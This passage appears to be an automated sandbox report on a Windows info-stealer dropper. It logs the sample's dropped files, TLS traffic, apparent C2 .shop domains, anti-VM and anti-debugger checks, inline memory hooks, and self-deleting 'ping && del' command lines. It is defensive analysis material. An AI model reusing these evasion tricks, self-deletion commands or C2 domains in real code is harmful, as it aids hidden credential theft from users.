Source: lWjPtDoy2N.exe, 00000006.00000003.2018525869.000000000560F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: lWjPtDoy2N.exe, 00000006.00000003.2018525869.000000000561F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: lWjPtDoy2N.exe, 00000006.00000003.2018525869.000000000561F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: lWjPtDoy2N.exe, 00000006.00000003.2000470931.0000000005427000.00000004.00000800.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000003.2000419397.000000000542E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: lWjPtDoy2N.exe, 00000006.00000003.2000470931.0000000005404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: lWjPtDoy2N.exe, 00000006.00000003.2000470931.0000000005427000.00000004.00000800.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000003.2000419397.000000000542E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: lWjPtDoy2N.exe, 00000006.00000003.2000470931.0000000005404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: lWjPtDoy2N.exe, 00000006.00000003.2000903797.0000000002ED3000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000003.2000839633.0000000005401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: lWjPtDoy2N.exe, 00000006.00000003.2000903797.0000000002ED3000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000003.2000839633.0000000005401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: lWjPtDoy2N.exe, 00000006.00000003.2018525869.000000000560F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: lWjPtDoy2N.exe, 00000006.00000003.2018525869.000000000561F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: lWjPtDoy2N.exe, 00000006.00000003.2018525869.000000000561F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: lWjPtDoy2N.exe, 00000006.00000003.2018525869.000000000561F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: lWjPtDoy2N.exe, 00000006.00000003.2018525869.000000000561F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: lWjPtDoy2N.exe, 00000006.00000003.2018525869.000000000561F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: 13w4NM6mPa.exe Static PE information: invalid certificate
Source: 13w4NM6mPa.exe, 00000000.00000000.1733518148.0000000002C0B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamepwsafe.exe< vs 13w4NM6mPa.exe
Source: 13w4NM6mPa.exe Binary or memory string: OriginalFilenamepwsafe.exe< vs 13w4NM6mPa.exe
Source: 13w4NM6mPa.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/9@2/4
Source: C:\Users\user\Desktop\13w4NM6mPa.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2416:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2488:120:WilError_03
Source: C:\Users\user\Desktop\13w4NM6mPa.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: lWjPtDoy2N.exe, 00000006.00000003.2000592637.0000000005406000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 13w4NM6mPa.exe ReversingLabs: Detection: 13%
Source: 13w4NM6mPa.exe Virustotal: Detection: 24%
Source: unknown Process created: C:\Users\user\Desktop\13w4NM6mPa.exe "C:\Users\user\Desktop\13w4NM6mPa.exe"
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process created: C:\Users\user\Desktop\lWjPtDoy2N.exe lWjPtDoy2N.exe
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe "start /min cmd.exe "/c timeout /t 3 /nobreak & del "C:\Users\user\Desktop\lWjPtDoy2N.exe"""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 3 /nobreak
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\user\Desktop\13w4NM6mPa.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process created: C:\Users\user\Desktop\lWjPtDoy2N.exe lWjPtDoy2N.exe Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\user\Desktop\13w4NM6mPa.exe" Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe "start /min cmd.exe "/c timeout /t 3 /nobreak & del "C:\Users\user\Desktop\lWjPtDoy2N.exe""" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 3 /nobreak Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: 13w4NM6mPa.exe Static file information: File size 21991832 > 1048576
Source: 13w4NM6mPa.exe Static PE information: Raw size of .data2 is bigger than: 0x100000 < 0x14be800
Source: 13w4NM6mPa.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: initial sample Static PE information: section where entry point is pointing to: .data2
Source: 13w4NM6mPa.exe Static PE information: section name: .data0
Source: 13w4NM6mPa.exe Static PE information: section name: .data1
Source: 13w4NM6mPa.exe Static PE information: section name: .data2
Source: promo[1].exe.0.dr Static PE information: section name: .dlmkln3
Source: promo[1].exe.0.dr Static PE information: section name: .dlmkln3
Source: promo[1].exe.0.dr Static PE information: section name: .dlmkln3
Source: lWjPtDoy2N.exe.0.dr Static PE information: section name: .dlmkln3
Source: lWjPtDoy2N.exe.0.dr Static PE information: section name: .dlmkln3
Source: lWjPtDoy2N.exe.0.dr Static PE information: section name: .dlmkln3
Source: C:\Users\user\Desktop\13w4NM6mPa.exe File created: C:\Users\user\Desktop\lWjPtDoy2N.exe Jump to dropped file
Source: C:\Users\user\Desktop\13w4NM6mPa.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\promo[1].exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 30E0005 value: E9 8B 2F E2 73 Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 76F02F90 value: E9 7A D0 1D 8C Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 3140007 value: E9 EB DF DF 73 Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 76F3DFF0 value: E9 1E 20 20 8C Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 3160005 value: E9 2B BA D6 73 Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 76ECBA30 value: E9 DA 45 29 8C Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 4D20008 value: E9 8B 8E 1F 72 Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 76F18E90 value: E9 80 71 E0 8D Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 4D30005 value: E9 8B 4D EC 70 Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 75BF4D90 value: E9 7A B2 13 8F Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 4D40005 value: E9 EB EB EC 70 Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 75C0EBF0 value: E9 1A 14 13 8F Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 4D50005 value: E9 8B 8A 28 70 Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 74FD8A90 value: E9 7A 75 D7 8F Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 4D60005 value: E9 2B 02 2A 70 Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Memory written: PID: 6704 base: 75000230 value: E9 DA FD D5 8F Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Memory written: PID: 3368 base: CA0005 value: E9 8B 2F 26 76 Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Memory written: PID: 3368 base: 76F02F90 value: E9 7A D0 D9 89 Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Memory written: PID: 3368 base: CB0007 value: E9 EB DF 28 76 Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Memory written: PID: 3368 base: 76F3DFF0 value: E9 1E 20 D7 89 Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process created: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\user\Desktop\13w4NM6mPa.exe"
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process created: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\user\Desktop\13w4NM6mPa.exe" Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\13w4NM6mPa.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Special instruction interceptor: First address: 190FED7 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Special instruction interceptor: First address: 18C20BA instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Special instruction interceptor: First address: 178D501 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Special instruction interceptor: First address: 210AA26 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe TID: 600 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe TID: 600 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: Amcache.hve.0.dr Binary or memory string: VMware
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.0.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 13w4NM6mPa.exe, 00000000.00000002.2078093614.000000000318E000.00000004.00000020.00020000.00000000.sdmp, 13w4NM6mPa.exe, 00000000.00000002.2078093614.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, 13w4NM6mPa.exe, 00000000.00000002.2078093614.00000000031EE000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000002.2064189081.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000002.2064322984.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lWjPtDoy2N.exe, 00000006.00000002.2064189081.0000000002E12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: Amcache.hve.0.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.0.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: lWjPtDoy2N.exe.0.dr, promo[1].exe.0.dr Binary or memory string: qEmu`A*8
Source: Amcache.hve.0.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr Binary or memory string: vmci.sys
Source: Amcache.hve.0.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.0.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.0.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr Binary or memory string: VMware20,1
Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.0.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\13w4NM6mPa.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe System information queried: KernelDebuggerInformation Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\13w4NM6mPa.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Process queried: DebugPort Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: lWjPtDoy2N.exe, 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: demonstationfukewko.shop
Source: lWjPtDoy2N.exe, 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: liabilitynighstjsko.shop
Source: lWjPtDoy2N.exe, 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: alcojoldwograpciw.shop
Source: lWjPtDoy2N.exe, 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: incredibleextedwj.shop
Source: lWjPtDoy2N.exe, 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: shortsvelventysjo.shop
Source: lWjPtDoy2N.exe, 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: shatterbreathepsw.shop
